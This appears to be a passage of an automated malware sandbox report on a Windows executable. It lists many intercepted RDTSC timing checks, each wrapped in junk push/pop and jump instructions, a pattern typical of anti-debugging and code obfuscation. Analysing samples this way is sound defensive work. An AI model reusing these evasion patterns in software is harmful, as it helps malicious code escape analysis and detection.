                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B44F3A second address: B44F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B49487 second address: B49491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B49491 second address: B494BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD0B5348056h 0x0000000a jmp 00007FD0B534805Ah 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FD0B534805Ch 0x00000019 je 00007FD0B5348056h 0x0000001f jno 00007FD0B534805Ah 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59F0E second address: B59F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007FD0B548336Ah 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59F21 second address: B59F26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59D75 second address: B59D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59D79 second address: B59D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59D82 second address: B59D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59D90 second address: B59D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B59D96 second address: B59DA2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0B5483366h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B65D86 second address: B65D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B65BDD second address: B65BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B65BE1 second address: B65BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B65BE5 second address: B65BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B65BF0 second address: B65BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jc 00007FD0B5348056h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B65BFE second address: B65C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B67814 second address: B6781A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B6781A second address: B6781F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B6781F second address: B67848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD0B5348056h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD0B5348065h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B67848 second address: B6784F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B6784F second address: B6786C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B5348069h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B679BD second address: B679DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FD0B548337Ah 0x0000000b jmp 00007FD0B5483372h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B679DC second address: B679E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B679E2 second address: B679EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B679EE second address: B679FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007FD0B5348056h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B8114D second address: B81153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B81723 second address: B8174D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 jmp 00007FD0B5348064h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FD0B534805Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B85DB2 second address: B85DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B548336Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B85FC2 second address: B85FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B85FC6 second address: B8603D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD0B5483378h 0x0000000e jno 00007FD0B5483368h 0x00000014 popad 0x00000015 nop 0x00000016 mov dword ptr [ebp+1244D2D8h], edi 0x0000001c push 00000004h 0x0000001e or dl, FFFFFFAFh 0x00000021 call 00007FD0B5483369h 0x00000026 pushad 0x00000027 je 00007FD0B548337Bh 0x0000002d jmp 00007FD0B5483375h 0x00000032 pushad 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 jmp 00007FD0B5483370h 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B8603D second address: B86041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B86041 second address: B86047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B86047 second address: B86076 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0B5348058h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jnp 00007FD0B534805Ch 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jc 00007FD0B5348056h 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B86076 second address: B8607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B8607A second address: B8608B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B87D90 second address: B87D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: B87D97 second address: B87DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B534805Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 516019A second address: 51601A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140EFA second address: 5140F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B534805Fh 0x00000009 sbb ax, 7F8Eh 0x0000000e jmp 00007FD0B5348069h 0x00000013 popfd 0x00000014 mov ax, 1A97h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007FD0B534805Ah 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FD0B534805Dh 0x0000002c add cl, 00000076h 0x0000002f jmp 00007FD0B5348061h 0x00000034 popfd 0x00000035 mov eax, 71C7A567h 0x0000003a popad 0x0000003b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 519001C second address: 5190096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bl, al 0x0000000d pushfd 0x0000000e jmp 00007FD0B5483371h 0x00000013 xor si, 2646h 0x00000018 jmp 00007FD0B5483371h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007FD0B5483377h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov di, DE56h 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FD0B5483375h 0x0000003a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5190096 second address: 51900A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51900A6 second address: 51900BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0B548336Ah 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51900BB second address: 51900CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51900CD second address: 51900D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512013D second address: 512015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B4h 0x00000005 mov ax, 5C97h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD0B534805Fh 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512015D second address: 512017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 512017A second address: 5120180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120180 second address: 5120184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5120184 second address: 51201A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0B5348062h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51201A1 second address: 51201A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140C7A second address: 5140CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 jmp 00007FD0B5348060h 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007FD0B5348060h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FD0B534805Eh 0x00000027 or cx, 3C08h 0x0000002c jmp 00007FD0B534805Bh 0x00000031 popfd 0x00000032 mov esi, 5E8B127Fh 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov ecx, ebx 0x0000003e call 00007FD0B5348063h 0x00000043 pop ecx 0x00000044 popad 0x00000045 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51407D7 second address: 51407DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51407DD second address: 51407E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51407E1 second address: 51407FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B548336Eh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51407FC second address: 514080B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140641 second address: 5140670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, C4h 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD0B548336Dh 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140670 second address: 5140674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140674 second address: 514067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 514067A second address: 5140691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B5348063h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140691 second address: 5140706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD0B5483373h 0x00000015 or ch, FFFFFFFEh 0x00000018 jmp 00007FD0B5483379h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FD0B5483370h 0x00000024 adc ch, FFFFFFF8h 0x00000027 jmp 00007FD0B548336Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140706 second address: 5140738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B534805Fh 0x00000009 sbb cl, FFFFFFBEh 0x0000000c jmp 00007FD0B5348069h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140738 second address: 5140797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FD0B548336Ch 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FD0B548336Dh 0x00000018 sbb ax, EDA6h 0x0000001d jmp 00007FD0B5483371h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FD0B5483370h 0x00000029 xor al, 00000048h 0x0000002c jmp 00007FD0B548336Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140360 second address: 5140366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140366 second address: 514036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 514036C second address: 51403A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD0B5348060h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51403A2 second address: 51403A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51403A6 second address: 51403C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51403C2 second address: 51403C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51403C8 second address: 51403CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51403CC second address: 51403E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B548336Bh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51403E4 second address: 5140401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5140401 second address: 5140427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B548336Dh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 515037D second address: 5150383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5150383 second address: 51503E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5483378h 0x00000008 pushfd 0x00000009 jmp 00007FD0B5483372h 0x0000000e sub ah, FFFFFFC8h 0x00000011 jmp 00007FD0B548336Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov ecx, 0939125Bh 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FD0B548336Dh 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD0B548336Dh 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51503E9 second address: 5150419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 4B85541Eh 0x00000013 call 00007FD0B534805Fh 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5150419 second address: 515041F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 514057C second address: 51405AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5348061h 0x00000008 mov bh, ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0B5348065h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51405AF second address: 51405C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51405C4 second address: 51405C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 51405C9 second address: 5140607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B548336Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007FD0B548336Eh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD0B5483377h 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\8ObkdHP9Hq.exeRDTSC instruction interceptor: First address: 5160076 second address: 51600A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5348065h 0x00000011 rdtsc
